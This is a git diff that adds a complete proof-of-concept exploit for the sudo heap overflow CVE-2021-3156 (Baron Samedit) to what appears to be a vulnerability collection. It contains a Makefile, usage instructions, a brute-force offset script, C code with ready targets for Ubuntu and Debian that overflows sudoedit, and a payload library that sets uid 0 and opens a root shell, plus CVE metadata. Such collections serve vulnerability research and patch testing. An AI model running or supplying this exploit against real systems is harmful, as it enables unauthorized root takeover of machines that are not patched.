diff --git a/cve/sudo/2021/CVE-2021-3156/Makefile b/cve/sudo/2021/CVE-2021-3156/Makefile new file mode 100644 index 0000000000000000000000000000000000000000..68ccbdd8026302c324f3ae8cbc98dc5de4f9ced5 --- /dev/null +++ b/cve/sudo/2021/CVE-2021-3156/Makefile @@ -0,0 +1,9 @@ +all: + rm -rf libnss_X + mkdir libnss_X + gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c + gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c +brute: all + gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c +clean: + rm -rf libnss_X sudo-hax-me-a-sandwich diff --git a/cve/sudo/2021/CVE-2021-3156/README.md b/cve/sudo/2021/CVE-2021-3156/README.md new file mode 100644 index 0000000000000000000000000000000000000000..06c694826fd6338f155d0cf389c6683a81b7f493 --- /dev/null +++ b/cve/sudo/2021/CVE-2021-3156/README.md @@ -0,0 +1,57 @@ +# CVE-2021-3156 PoC + +## Introduction + +This is an exploit for the `CVE-2021-3156` sudo vulnerability (dubbed [Baron Samedit](https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt) by Qualys). + +## Usage + +build: +``` +$ make +``` + + +list targets: +``` +$ ./sudo-hax-me-a-sandwich +``` + +run: +``` +$ ./sudo-hax-me-a-sandwich +``` + +manual mode: +``` +$ ./sudo-hax-me-a-sandwich +``` + +## Bruteforce target finding (experimental) + +Make sure you have [GNU parallel](https://ftpmirror.gnu.org/parallel/parallel-latest.tar.bz2) installed. + +``` +$ make brute +$ ./brute.sh +``` + +some defaults to try: +``` +$ ./brute.sh 90 120 50 70 150 300 +``` + +Will eat up all available cores. Don't try to netflix & brute. + +## Contributing + +Send (sensible) PR's, I might merge. + +Some ideas: +* More targets +* Target finding +* Other exploitation strategies +* More self contained functionality: + * Embed shared library hax.c (Make it small please, ELF golf + asm setuid/execve stub) + * Add mkdir logic to hax.c +* Directory/shared library cleanup diff --git a/cve/sudo/2021/CVE-2021-3156/brute.sh b/cve/sudo/2021/CVE-2021-3156/brute.sh new file mode 100755 index 0000000000000000000000000000000000000000..7bfff08c9577cfd750c7ec8718eecd46d460d123 --- /dev/null +++ b/cve/sudo/2021/CVE-2021-3156/brute.sh @@ -0,0 +1,90 @@ +#!/bin/bash + +try_brute() { + IDX=`echo "$1" | awk -F ':' '{ print $1 }'` + ALEN=`echo "$1" | awk -F ':' '{ print $2 }'` + BLEN=`echo "$1" | awk -F ':' '{ print $3 }'` + NLEN=`echo "$1" | awk -F ':' '{ print $4 }'` + LCLEN=`echo "$1" | awk -F ':' '{ print $5 }'` + OFN=out/`printf "%08d" $IDX`.txt + + ( + timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 + ) > $OFN + + R="`grep -B999 bl1ng $OFN`" + + if [ "$R" == "" ]; then + echo "NOPE" + else + echo "==================" >> success.txt + grep -B999 bl1ng $OFN >> success.txt + fi + + rm -f "${OFN}" +} + +if [ "$#" == "1" ]; then + N=`echo "$1" | awk -F ':' '{ print NF }'` + if [ "$N" == 5 ]; then + try_brute "$1" + exit 0 + fi +fi + +if [ "$#" != "6" ]; then + echo "usage: $0 " + exit 0 +fi + +if ! [ -x "$(command -v parallel)" ]; then + echo "error: gnu parallel not found" + exit 1 +fi + +smash_min=$1 +smash_max=$2 +null_min=$3 +null_max=$4 +lc_min=$5 +lc_max=$6 + +echo "[+] cleaning up.." +rm -rf possib +rm -rf success.txt +touch success.txt +mkdir out 2>/dev/null +# people are likely to forget this +make brute 2>/dev/null + +# generate permutations +echo "[+] generating possibilities.." +i=0 +for smash_len in `seq $smash_min $smash_max`; do +for null_stomp_len in `seq $null_min $null_max`; do +for lc_all_len in `seq $lc_min 10 $lc_max`; do + if [ "$[$smash_len % 2]" == "1" ]; then + alen=$[($smash_len-1)/2] + blen=$[$alen + 1] + else + alen=$[$smash_len/2] + blen=$alen + fi + + echo "$i:${alen}:${blen}:${null_stomp_len}:${lc_all_len}" >> possib + i=$[$i+1] +done +done +done + +# start bruting +echo "[+] lets go.." +parallel -j +`nproc` --eta $0 < possib + +echo "[+] done" +if [ "`cat success.txt|wc -l`" == "0" ]; then + echo "[-] we didnt find any working candidates :(" +else + echo "[+] we found some goodies (saved in success.txt):" + cat success.txt +fi diff --git a/cve/sudo/2021/CVE-2021-3156/hax.c b/cve/sudo/2021/CVE-2021-3156/hax.c new file mode 100644 index 0000000000000000000000000000000000000000..dd33fa20a2ad04cb10c3de3910d392284a114e8c --- /dev/null +++ b/cve/sudo/2021/CVE-2021-3156/hax.c @@ -0,0 +1,158 @@ +/** + ** CVE-2021-3156 PoC by blasty + ** =========================================== + ** + ** Exploit for that sudo heap overflow thing everyone is talking about. + ** This one aims for singleshot. Does not fuck with your system files. + ** No warranties. + ** + ** Shout outs to: + ** Qualys - for pumping out the awesome bugs + ** lockedbyte - for coop hax. (shared tmux gdb sessions ftw) + ** dsc - for letting me rack up his electricity bill + ** my wife - for all the quality time we had to skip + ** + ** Enjoy! + ** + ** -- blasty // 20210130 + **/ + +#include +#include +#include +#include +#include +#include + +// 512 environment variables should be enough for everyone +#define MAX_ENVP 512 +#define SUDOEDIT_PATH "/usr/bin/sudoedit" + +typedef struct { + char *target_name; + char *sudoedit_path; + uint32_t smash_len_a; + uint32_t smash_len_b; + uint32_t null_stomp_len; + uint32_t lc_all_len; +} target_t; + +target_t targets[] = { + { + // Yes, same values as 20.04.1, but also confirmed. + .target_name = "Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27", + .sudoedit_path = SUDOEDIT_PATH, + .smash_len_a = 56, + .smash_len_b = 54, + .null_stomp_len = 63, + .lc_all_len = 212 + }, + { + .target_name = "Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31", + .sudoedit_path = SUDOEDIT_PATH, + .smash_len_a = 56, + .smash_len_b = 54, + .null_stomp_len = 63, + .lc_all_len = 212 + }, + { + .target_name = "Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28", + .sudoedit_path = SUDOEDIT_PATH, + .smash_len_a = 64, + .smash_len_b = 49, + .null_stomp_len = 60, + .lc_all_len = 214 + } +}; + +void usage(char *prog) { + fprintf(stdout, + " usage: %s \n\n" + " available targets:\n" + " ------------------------------------------------------------\n", + prog + ); + for(int i = 0; i < sizeof(targets) / sizeof(target_t); i++) { + printf(" %d) %s\n", i, targets[i].target_name); + } + fprintf(stdout, + " ------------------------------------------------------------\n" + "\n" + " manual mode:\n" + " %s \n" + "\n", + prog + ); +} + +int main(int argc, char *argv[]) { + printf("\n** CVE-2021-3156 PoC by blasty \n\n"); + + if (argc != 2 && argc != 5) { + usage(argv[0]); + return -1; + } + + target_t *target = NULL; + if (argc == 2) { + int target_idx = atoi(argv[1]); + + if (target_idx < 0 || target_idx >= (sizeof(targets) / sizeof(target_t))) { + fprintf(stderr, "invalid target index\n"); + return -1; + } + + target = &targets[ target_idx ]; + } else { + target = malloc(sizeof(target_t)); + target->target_name = "Manual"; + target->sudoedit_path = SUDOEDIT_PATH; + target->smash_len_a = atoi(argv[1]); + target->smash_len_b = atoi(argv[2]); + target->null_stomp_len = atoi(argv[3]); + target->lc_all_len = atoi(argv[4]); + } + + printf( + "using target: %s ['%s'] (%d, %d, %d, %d)\n", + target->target_name, + target->sudoedit_path, + target->smash_len_a, + target->smash_len_b, + target->null_stomp_len, + target->lc_all_len + ); + + char *smash_a = calloc(target->smash_len_a + 2, 1); + char *smash_b = calloc(target->smash_len_b + 2, 1); + + memset(smash_a, 'A', target->smash_len_a); + memset(smash_b, 'B', target->smash_len_b); + + smash_a[target->smash_len_a] = '\\'; + smash_b[target->smash_len_b] = '\\'; + + char *s_argv[]={ + "sudoedit", "-s", smash_a, "\\", smash_b, NULL + }; + + char *s_envp[MAX_ENVP]; + int envp_pos = 0; + + for(int i = 0; i < target->null_stomp_len; i++) { + s_envp[envp_pos++] = "\\"; + } + s_envp[envp_pos++] = "X/P0P_SH3LLZ_"; + + char *lc_all = calloc(target->lc_all_len + 16, 1); + strcpy(lc_all, "LC_ALL=C.UTF-8@"); + memset(lc_all+15, 'C', target->lc_all_len); + + s_envp[envp_pos++] = lc_all; + s_envp[envp_pos++] = NULL; + + printf("** pray for your rootshell.. **\n"); + + execve(target->sudoedit_path, s_argv, s_envp); + return 0; +} diff --git a/cve/sudo/2021/CVE-2021-3156/lib.c b/cve/sudo/2021/CVE-2021-3156/lib.c new file mode 100644 index 0000000000000000000000000000000000000000..e999b3b3ec65a2d6bbb7400c4a03993f4cbd9f55 --- /dev/null +++ b/cve/sudo/2021/CVE-2021-3156/lib.c @@ -0,0 +1,16 @@ +#include +#include +#include +#include + +static void __attribute__ ((constructor)) _init(void); + +static void _init(void) { + printf("[+] bl1ng bl1ng! We got it!\n"); +#ifndef BRUTE + setuid(0); seteuid(0); setgid(0); setegid(0); + static char *a_argv[] = { "sh", NULL }; + static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL }; + execv("/bin/sh", a_argv); +#endif +} diff --git a/cve/sudo/2021/yaml/CVE-2021-3156.yaml b/cve/sudo/2021/yaml/CVE-2021-3156.yaml new file mode 100644 index 0000000000000000000000000000000000000000..d99375223a23ba8b61d5bb0aa876fc3b136bb8d5 --- /dev/null +++ b/cve/sudo/2021/yaml/CVE-2021-3156.yaml @@ -0,0 +1,20 @@ +id: CVE-2021-3156 +source: https://github.com/blasty/CVE-2021-3156 +info: + name: Sudo是一款使用于类Unix系统的,允许用户通过安全的方式使用特殊的权限执行命令的程序。 + severity: high + description: | + Sudo before 1.9.5p2 存在缓冲区错误漏洞,攻击者可使用sudoedit -s和一个以单个反斜杠字符结束的命令行参数升级到root。 + scope-of-influence: + 小于1.9.5p2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-3156 + - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-3156 + cwe-id: CWE-193 + cnvd-id: None + kve-id: None + tags: 堆缓冲区溢出漏洞,cve2021,权限提升 \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index c230e28e3d30bcbf7cb7e84abd23bcb477c3d006..e18965ad3edbf4bbf4ef9cd4fa28f01aa807fd03 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -10,5 +10,7 @@ cve: - CVE-2022-0185 - CVE-2022-24122 - CVE-2022-0492 + sudo: + - CVE-2021-3156 cnvd: kve: \ No newline at end of file